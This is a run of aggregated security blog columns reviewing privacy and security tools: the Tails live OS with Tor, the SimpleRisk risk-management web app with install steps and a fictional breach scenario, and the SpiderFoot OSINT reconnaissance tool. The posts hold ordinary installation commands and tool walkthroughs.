When you boot Tails, the first thing you’ll see, as noted in Figure 1 is the Tails Greeter which offers you More Options. Selecting Yesleads you to the option to set an administrative password (recommended) as well as Windows XP Camouflage mode (makes Tails look like Windows XP when you may have shoulder surfers).

FIGURE 1: Tails Greeter
You can also boot into a virtual machine, but there are some specific drawbacks to this method (the host operating system and the virtualization software can monitor what you are doing in Tails). However Tails will warn you as seen in Figure 2.

FIGURE 2: Tails warns regarding a VM and confirms Tor
Tor

You’ll also note in Figure 2 that TorBrowser (built on Iceweasel, a Firefox alternative) is already configured to use Tor, including the Torbutton, as well as NoScript, Cookie Monster, and Adblock Plus add-ons. There is one Tor enhancement to consider that can be added during the boot menu sequence for Tails where you can interrupt the boot sequence with Tab, hit Space, and then add bridge to enable Tor Bridge Mode.  According to the Tor Project, bridge relays or bridges for short are Tor relays that aren't listed in the main Tor directory. As such, even if your ISP is filtering connections to all known Tor relays, they probably won't be able to block all bridges. If you suspect access to the Tor network is being blocked, consider use of the Tor bridge feature as supported fully by Tails when booting in bridge mode. Control Tor with Vidalia which is available via the onion icon the notification area found in the upper right area of the Tails UI. 
One last note on Tor use as already described on the Tails Warning page you should have already read. Your Tor use is only as good as your exit node. Remember, “Tor is about hiding your location, not about encrypting your communication.” Tor does not, and cannot, encrypt the traffic between an exit node and the destination server. Therefore, any Tor exit node is in a position to capture any traffic passing through it and you should thus use end-to-end encryption for all communications. Be aware that Tails also offers I2Pas an alternative to Tor.

Encryption Options and Features

HTTPS Everywhere is already configured for you in Tor Browser. HTTPS Everywhere uses a ruleset with regular expressions to rewrite URLs to HTTPS. Certain sites offer limited or partial support for encryption over HTTPS, but make it difficult to use where they may default to unencrypted HTTP, or provide hyperlinks on encrypted pages that point back to the unencrypted site.

You can use Pidgin for instant messaging which includes OTR or off-the-record encryption. Each time you start Tails you can count on it to generate a random username for all Pidgin accounts.

If you’re afraid the computer you’ve booted Tails on (a system in an Internet café or library) is not trustworthy due to the like of a hardware keylogger, you can use the Florence virtual keyboard, also found in the notification area as seen in Figure 3.

FIGURE 3: The Tails virtual keyboard
If you’re going to create a persistent volume (recommended) when you use Tails from USB media, do so easily with Applications | Tails | Configure persistent volume. Reboot, then be sure to enable persistence with the Tails Greeter. You will need to setup the USB stick to leave unused space for a persistent volume.
You can securely wipe files and cleanup available space thereafter with Nautilus Wipe. Just right click a file or files in the Nautilus file manager and select Wipe to blow it away…forever…in perpetuity.
KeePassX is available to securely manage passwords and store them on your persistent volume. You can also configure all your keyrings (GPG, Gnome, Pidgin) as well as Claws Mail. Remember, the persistent volume is encrypted upon creation.
You can encrypt text with a passphrase, encrypt and sign text with a public key, and decrypt and verify text with the Tails gpgApplet (the clipboard in the notification area).

One last cool Tails feature that doesn’t garner much attention is the Metadata Anonymisation app. This is not unlike Informatica 64’s OOMetaExtractor, the same folks who bring you FOCA as described in the March 2011 toolsmith.  Metadata Anonymisation is found under Applications then Accessories. This application will strip all of those interesting file properties left in metadata such as author names and date of creation or change. I have used my share of metadata to create a target list for social engineering during penetration tests so it’s definitely a good idea to clean docs if you’re going to publish or share them if you wish to remain anonymous. Figure 4 shows a before and after collage of PowerPoint metadata for a recent presentation I gave.
FIGURE 4: Metadata cleanup with Tails
There are numerous opportunities to protect yourself using The Amnesiac Incognito Live System and I strongly advocate for you keeping an instance at the ready should you need it. It’s ideal for those of you who travel to hostile computing environments, as well as for those of you non-US readers who may not benefit from the same level of personal freedoms and protection from censorship that we typically enjoy here in the States (tongue somewhat in cheek given current events described herein).

Conclusion

Aside from hoping you’ll give Tails a good look and make use of it, I’d like to leave you with two related resources well worth your attention. The first is a 2007 presentation from Dan Shumow and Niels Ferguson of Microsoft titled On the Possibility of a Back Door in the NIST SP800-90 Dual Ec Prng. Yep, the same random number generator as described in the introduction to this column. The second resource is from bettercrypto.org and is called Applied Crypto Hardening. Systems administrators should definitely give this one a read.
Enjoy your efforts to shield yourself from watchful eyes and ears and let me know what you think of Tails. Ping me via Twitter via @holisticinfosec or email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

2013 Toolsmith Tool of the Year: Recon-ng

$
0
0
Congratulations to Tim Tomes of Black Hills Information Security.
@LaNMaSteR53's Recon-ng is the 2013 Toolsmith Tool of the Year.
We had quite the turnout this year, with 881 total votes.
Recon-ng finished first with 44% of the vote, in a very tight race with ProcDOT which came in second with 40%, and all others pulling up the rear.
Tim will receive a book of his choosing or a donation to his preferred charity. 


Congratulations and thank you to all of this year's participants. 2014 should bring us another great year of tools for information security practitioners. Please feel free to submit your favorites for consideration.

toolsmith: SimpleRisk - Enterprise Risk Management Simplified

$
0
0


Prerequisites/dependencies
LAMP/XAMPP server

Introduction
Our editorial theme for February’s ISSA Journal happens to be Risk, Threats, and Vulnerabilitieswhich means that Josh Sokol’s SimpleRisk as our toolsmith topic is bona fide kismet. I am a major advocate for simplicity and as the occasional practitioner of simpleton arts, SimpleRisk fits my needs perfectly. SimpleRisk is a free and open source web application, released under Mozilla Public License 2.0, and is extremely useful in performing risk management activities. In my new role at Microsoft, I’m building, with a fine team of engineers, a Threat Intelligence and Engineering practice. This effort is intended to be much more robust than what you may currently understand to be Threat Intelligence. Limiting such activity to monitoring threat feeds, deriving indicators of compromise, and reporting out findings is insufficient to cover the vast realm of risk, threats, and vulnerabilities. As such, we include constant threat assessments of our infrastructure and services in a manner that includes risk analysis and threat modeling, based on SDL principles and the infrastructure threat modeling guidance I wrote some years ago. Keeping in mind that threat modeling can be software-centric, asset-centric, and attacker-centric, recognize that the amount of data you generate can be overwhelming. In addition to embracing the principles of good data science, we’ve also expanded our tooling to include the likes of SimpleRisk. I asked Josh to provide us with insight on SimpleRisk in his own words:
As security professionals, almost every action we take comes down to making a risk-based decision.  Web application vulnerabilities, malware infections, physical vulnerabilities, and much more all boil down to some combination of the likelihood of an event happening and the impact of that event.  Risk management is a relatively simple concept to grasp, but the place where many practitioners fall down is in the tool set.  The lucky security professionals work for companies who can afford expensive GRC tools to aide in managing risk.  The unlucky majority out there usually end up spending countless hours managing risk via spreadsheets.  It's cumbersome, time consuming, and just plain sucks.  After starting a Risk Management program from scratch at a $1B a year company, I ran into these same barriers, and when budget wouldn't allow me the GRC route, I finally decided to do something about it.  At Black Hat and BSides Las Vegas 2013, I formally debuted SimpleRisk. A SimpleRisk instance can be stood up in minutes and instantly provides the security professional with the ability to submit risks, plan mitigations, facilitate management reviews, prioritize for project planning, and track regular reviews.  It is highly configurable and includes dynamic reporting and the ability to tweak risk formulas on the fly.  It is under active development with new features being added all the time and can be downloaded at http://www.simplerisk.org.  SimpleRisk is truly Enterprise Risk Management simplified.
I can tell you with certainty that a combination of tactics, techniques, and procedures inclusive of threat modeling and analysis, good data science (read The Field Guide to Data Science), and risk management with the likes of SimpleRisk, will lead to an improved security posture. I’ll walk you through a recreation of various real world scenarios and current events using SimpleRisk after some quick installation pointers.

Quick installation notes

I run SimpleRisk on an Ubuntu 13.10 virtual machine configured with a full LAMP stack. Without question you should read the SimpleRisk LAMP Installation Guide, but I’ll give you a quick overview of my installation steps, establishing SimpleRisk as the primary application in the Apache web root:
1)      cd /var/www
2)      Download the latest installation bundle, currently (subject to change): sudo wget http://simplerisk.googlecode.com/files/simplerisk-20131231-001.tgz
3)      sudo tar zxvf simplerisk-20131231-001.tgz
4)      sudo mv simplerisk/ * . (moves all SimpleRisk app files to the web root)
5)      sudo rm simplerisk-20131231-001.tgz(removes the installation bundle)
6)      sudo rm simplerisk (removes the now empty simplerisk directory)
7)      cd ~
8)      Download the SimpleRisk database import: wget http://simplerisk.googlecode.com/files/simplerisk-20131231-001.sql
9)      mysql –u root -p
10)   create database simplerisk;
11)   use simplerisk;
12)   source ~/simplerisk-20131231-001.sql(populates the SimpleRisk database)
13)   GRANT SELECT, INSERT, UPDATE, DELETE ON simplerisk.* TO 'simplerisk'@'localhost' IDENTIFIED BY 'CHANGEME'; (creates the SimpleRisk database user, change CHANGEME to your preferred password)
14)   exit
15)   sudo gedit /var/www/includes/config.php
16)   Edit line 16 with the database password you set in step 13 (you can also change your timezone in config.php)
17)   Browse to your web server’s root and login as admin with password admin
18)   Click the Admin button in the upper right of the UI then click My Profile
19)   Change the admin password!

SimpleRisk and the Flintstones

Flintstone, Inc. a prehistoric cave retailer with a strong online presence has been hacked by the Bedrock Electronic Militia. In one breach, 40 million clams have been stolen, and soon thereafter it is revealed that 70 million additional clams are compromised. Additionally, the attackers have used social engineering to gain access to Flintstone.net social media accounts, including Critter and Cavebook, as well as the Flintstone, Inc. blog. Even the Bedrock news media outlet, Cave News Network, is not immune to Bedrock Electronic Militia’s attacks. Fred and Wilma, the CISO and CEO, are very concerned that their next PCI audit is going to be very difficult given the breach and they want to use SimpleRisk to track and manage the risks they need to mitigate, as well as the related projects necessary to fulfill the mitigations. The SimpleRisk admin has created two accounts for Fred and Wilma; they’re impressed with the fact that the User Management options under Configure are so granular specific to User Responsibilities, including the ability to Submit New Risks, Modify Existing Risks, Close Risks, Plan Mitigations, Review Low Risks, Review Medium Risks, Review High Risks, and Allow Access to "Configure" Menu. Fred and Wilma are also quite happy that the SimpleRisk user interface is so…simple. Fred first uses the Configure| Add and Remove Values menu to add Online and Retail Stores as Site/Location values given the variety and location of risks identified. He also adds Identity Management under Team, as well as POS and Proxy under Technology. Fred notes that the Configure menu also offers significant flexibility in establishing risk formula preferences, review (high, medium, low) settings, and the ability to redefine naming conventions for impact, likelihood, and mitigation effort. He and Wilma then immediately proceed to the Risk Management menu to, you guessed it, begin to manage risks exposed during the breach root cause analysis and after action report. To get started the Flintstones immediately identify five risks to document:
1)      Account compromise via social engineering
a.       The Flintstone.net Critter and Cavebook accounts were compromised when one of their social media management personnel were spear phished
2)      Inadequate antimalware detection
a.       One of the spear phishing emails included a malicious attachment that was not detected by Dinosoft Security Essentials
3)      Flintstone, Inc. users compromised via watering hole attacks
a.       A lack of egress traffic analysis, detection, and prevention from Flintstone.net corporate networks meant that users were compromised when enticed to visit a known good website that had been compromised with the Blackrock Exploit Kit
4)      Flintstone.com web application vulnerable to cross-site scripting (XSS)  
a.       Attackers can use XSS vulnerabilities to deliver malicious payloads in a more trusted manner given that they execute in the context of the vulnerable site
5)      Flintstone, Inc. Point Of Sale (POS) compromised with Frack POS malware
a.       All POS devices must be scanned with the SecureSlate’s Frack POS Malware Scan

As seen in Figure 1, Fred can be very specific in his risk documentation.

FIGURE 1: Fred submits risk for SimpleRisk documentation
As Fred works on the watering hole risk, he decides he’d rather use CVSS risk scoring than classic and is overjoyed to discover that SimpleRisk includes a CVSS calculator as seen in Figure 2. There is also an OWASP calculator the Fred uses when populating the XSS risk and a DREAD calculator he uses for the POS risk.

FIGURE 2: Fred calculates a CVSS score with SimpleRisk CVSS calculator
When Fred and Wilma move to the Plan Your Mitigations phase they are a bit taken aback to find that SimpleRisk has stack ranked the XSS risk as the highest, as seen in Figure 3, but they recognize that risk calculations can be somewhat subjective and that each scoring calculator (CVSS, DREAD, OWASP) derives scores differently. SimpleRisk does include links to references for how each is calculated.

FIGURE 3: SimpleRisk risk ranking allows mitigation prioritization
Fred and Wilma believe that the XSS vulnerability happens to be one they can have mitigated rather quickly and at a low cost, so they choose to focus there first. Clicking No under Mitigation Planned for ID 1004 leads them to the Submit Risk Mitigation page. They submit their planned mitigation as seen in Figure 4.

FIGURE 4: SimpleRisk XSS mitigations submittal
After SimpleRisk accepts the mitigation Fred and Wilma are sent promptly to the Perform Management Reviews phase where they choose to review ID 1001 Account Compromised via social engineering by clicking Noin the related row under the Management Review column. Under Submit Management Review they choose to Approve Risk (versus reject), Consider for Project as the Next Stepand add Deploy two factor authentication under Comments.
Under Prioritize for Project Planning, Fred and Wilma then add a new project called Two Factor Authentication Deployment. They can add other projects and prioritize them later. They also set a schedule to review risks regularly after planning mitigations for, and a conducting reviews of, their remaining risks.
As the CISO and CEO of Flintstone, Inc., Fred and Wilma love their executive dashboards. They check the SimpleRisk Risk Dashboardunder Reporting, as seen in Figure 5.

FIGURE 5: SimpleRisk Risk Dashboard
They also really appreciate that SimpleRisk maintains an audit trail for all changes and updates made.
Finally, Fred and Wilma decide to take advantage of some SimpleRisk “extras” that cost a bit but are offered under a perpetual license:
·         Custom Authentication Extra: Currently provides support for Active Directory Authentication and Duo Security multi-factor authentication, but will have other custom authentication types in the future.
·         Team Based Separation Extra: Restriction of risk viewing to team members the risk is categorized as.
·         Notification Extra: Email notifications when risks are updated or due for action.
·         Encrypted Database Extra: Encryption of sensitive text fields in the database.

In Conclusion

Josh has devised a great platform in SimpleRisk; I’m really glad to have caught mention of it rolling by in Twitter reads. It fits really nicely in any threat/risk management program. On a related note, as I write this Adam Shostack’s new book, ThreatModeling: Designing for Security is nearing its publication date (17 FEB 2014, Wiley). Be sure to grab a copy and incorporate its guidance into your risk, threat and vulnerability management practice along with the use of SimpleRisk.
Ping me via email if you have questions or suggestions for topic via russ at holisticinfosec dot org or hit me on Twitter @holisticinfosec.
Cheers…until next month.

Acknowledgements

Josh Sokol, SimpleRisk developer and project lead

toolsmith: SpiderFoot

$
0
0


Prerequisites/dependencies
Python 2.7 if running on *nix as well as M2Crypto, CherryPy, netaddr, dnspython, and Mako modules
Windows version comes as a pre-packaged executable, no dependencies

Introduction
All good penetration tests and threat assessments should be initiated with what you’ve seen referred to in toolsmith as OSINT, or open source intelligence gathering. This practice contributes greatly to collecting a useful list of targets of opportunity. One key element to remember though, the bad guys are conducting this same activity against you and your Internet-facing assets too. It’s probably best then that you develop your own OSINT practice so you can find the information you may not wish to, or even know, you are exposing. Steve Micallef’s SpiderFoot is another tool in the arsenal specific to this cause. You may already be aware that the four phases of a web application security assessment, as defined using the SamuraiWTF distribution, are recon, mapping, discovery, and exploitation. The SANS GIAC Certified Web Application Penetration Tester (GWAPT) curriculum follows suit given that Secure Idea’s Kevin Johnson contributed heavily (developed) to both. SpiderFoot nicely blends both recon and mapping as part of its feature set. As we consider legal, privacy, and ethics issues for the March ISSA Journal, OSINT and reconnaissance become interesting and related topics. I have, on more than one occasion, discovered very damaging data via OSINT tactics that, if in the wrong hands, could have been very damaging. When you consider findings of this nature with regard to ethics and the legality you may find yourself in an immediate quandary. Are you obligated to report findings that you know could cause harm to the target if left unmitigated? What if during your analysis you come into possession of classified or proprietary information that having in your possession could create legal challenges for you? Imagine findings of this caliber and it becomes easy to recognize why you should always conduct intelligence gathering and footprinting on your own interests before the wrong people do it for you. SpiderFoot, as a tool for just such purposes, allows you to understand “as much as possible about a given target in order to perform a more complete security penetration test.” For large networks, this can be a daunting task, and SpiderFoot automates this process significantly, allowing penetration testers to focus their efforts on security testing itself.
Steve provided us with some SpiderFoot history as well as insight on what he finds useful and interesting. He originally wrote SpiderFoot as a C# .NET application in 2005, purely as an exercise to learn C#, having been inspired by BiDiBLAH’s developers from Sensepost (who went on to create Maltego), thinking he could make a lighter open source version. For seven years that was Steve’s first and only release until he decided to resume development again in 2012. His work on next generation versions have led SpiderFoot to be cross platform (Python), far more extensible, functional, with a much nicer user interface (UI).
Steve’s current challenge with SpiderFoot is deciding what cool functionality to implement next, his to-do list is ever growing and there are a numerous features he’d love to extend it to include. He typically balances his time between UI/analysis functionality versus new checks to identify more items to aid the penetration tester. The aforementioned OSINT (Open Source Intelligence) community also continues to produce new sources which in turn inspire Steve to build new SpiderFoot checks.
He finds it interesting testing out a new module, and actually finding insightful items out there on the Internet simply during the development process. Steve’s favorite functionality at the moment is identifying owned netblocks, and co-hosted sites. Owned Netblocks indicates entire IP ranges that an organization owns, which enables penetration testers to more completely scan the perimeter of a target. Co-hosted Sitesshows you any websites on the same server as the target, which can also be revealing. If your target is hosted on the same server as sites identified as being malicious by the malicious site checker, or the blacklist checker plug-in it could potentially indicate that your target is hosted on a compromised server.
As you read this it’s likely that the following planned enhancements are available in SpiderFoot or will be soon:
·         2.1.2 (early March)
o   SOCKS proxy support
o   Real-time scan progress viewer
o   Identify scan quality impacting issue
o   Autoshun (www.autoshun.org) lookup as part of malicious checks
o   SANS (isc.sans.edu) lookup as part of malicious checks (queue the Austin Powers voice: “Yeah, baby!”)
o   Update GeoIP checker
·         2.1.3 (mid April)
o   VirusTotal, SHODAN, Facebook, Xing, Pastebin and GitHub plug-ins
Note that when you pull SpiderFoot from GitHub, you are downloading a beta version of the next release, as Steve commits new functionality there periodically in preparation for the next version. For instance, SOCKS functionality is in the GitHub repository right now but not in the packaged released version (2.1.1.).
SpiderFoot is a great project with a strong development roadmap, so let’s get down to business and explore.

Quick installation notes

Windows installation is an absolute no brainer; download the package, unpack it, execute sf.exe, and browse to http://127.0.0.1:5001. All dependencies are met including a standalone Python interpreter, so you may find this option optimal.
Linux (I installed it on SamuraiWTF) users need to settle a few dependencies easily solved with the following few steps that assume pip is already installed:
sudo apt-get install swig
sudo pip install mako cherrypy netaddr M2Crypto dnspython
git clone https://github.com/smicallef/spiderfoot.git
cd spiderfoot/
sudo python ./sf.py 0.0.0.0:9999
The last line indicates that you’d like SpiderFoot to bind to all addresses (including localhost) and listen on port 9999. You can define your preferred port or just accept default if undefined (5001). Steve reminds us on his installation page to be cautious regarding exposing SpiderFoot to hostile networks (Intranet, security conference wireless) given that there is currently no authentication scheme.

SpiderFoot unleashed

The SpiderFoot UI is, how shall I say, incredibly simple, intuitive, and obvious even. To start a scan…wait for it…select New Scan. Figure 1 represents a scan being kicked off on my domain (don’t do it) as defined by the By Module view.

FIGURE 1: Kicking off a new scan with SpiderFoot
If you wish to more granularly define your scans, select the By Required Data view (default) then pick and choose your preferred data points including elements such as malicious affiliations, IP data, URL analysis, SSL certificate information, affiliate details, and many other record. You should then be treated to a success message. Scans results are stored in a SQLite DB so over time you’ll likely build up a collection if you don’t purge. Under the Scans tab as seen in Figure 2 you can click the scan in the Namecolumn of the table view and review results. You’ll also note status here and can also halt the scan if need be. I imagine the real-time scan progress viewer will show itself here in the near future as well.

FIGURE 2: SpiderFoot Scans view
If need be (default settings work quite well), you can tune the actual scan configuration as well via Settings, with attention to how you’d like to tune storage, search engines, port scanning, spidering, TLD searches (see Figure 3), amongst others.

FIGURE 3: SpiderFoot Settings view
When my scan completed, with default settings and all checks enabled, the results included 11360 elements. For you data miners, metrics minions, and hosting harvesters, you can export the results to CSV (see Figure 4) and filter by findings type and module, or your preferred data pivot.

FIGURE 4: SpiderFoot results and export functionality
As I navigated all the results, I was intrigued to find a hit for URL (Uses Flash) simply because I didn’t recall any Flash features on my site. I immediately chuckled when I reviewed the result as it was specific to a Flash video I’d created for the 2008 ISSA Northwest Regional Conference wherein I ripped on the now defunct Hacker Safe trustmark for indicating that their customer’s sites were “hacker safe” when, in fact, they were not. Oh, the good old days.
Want to visualize your results? No problem, you can choose from a bubble view of data elements or the discovery path. Figure 5 represents the discovery path for Social Media Presence findings. Hover over each entity for details specific to initial target type, the source module, and the related result.

FIGURE 5: SpiderFoot visualizes a discovery path
SpiderFoot will absolutely uncover nuggets you may have long forgotten about and may want to remove as they are potentially vulnerable (outdated plugins, modules, etc.) or unnecessarily/unintentionally exposed. I found an old dashboard I’d built by hand eons ago with long dead extenal JavaScript calls that had no business still being available. “Be gone!”, I said. That is what SpiderFoot is all about. Add it to the tool collection for penetration tests and OSINT expeditions; you won’t be disappointed.

In Conclusion

Steve Micallef’s SpiderFoot is functionally simple but feature rich and getting better all the time as it is well built and maintained. Follow @binarypool on Twitter and keep an eye out for timely and regular releases.
Ping me via email if you have questions or suggestions for topic via russ at holisticinfosec dot org or hit me on Twitter @holisticinfosec.
Cheers…until next month.

Acknowledgements

Steve Micallef (@binarypool), Spiderfoot author
Viewing all 134 articles
Browse latest View live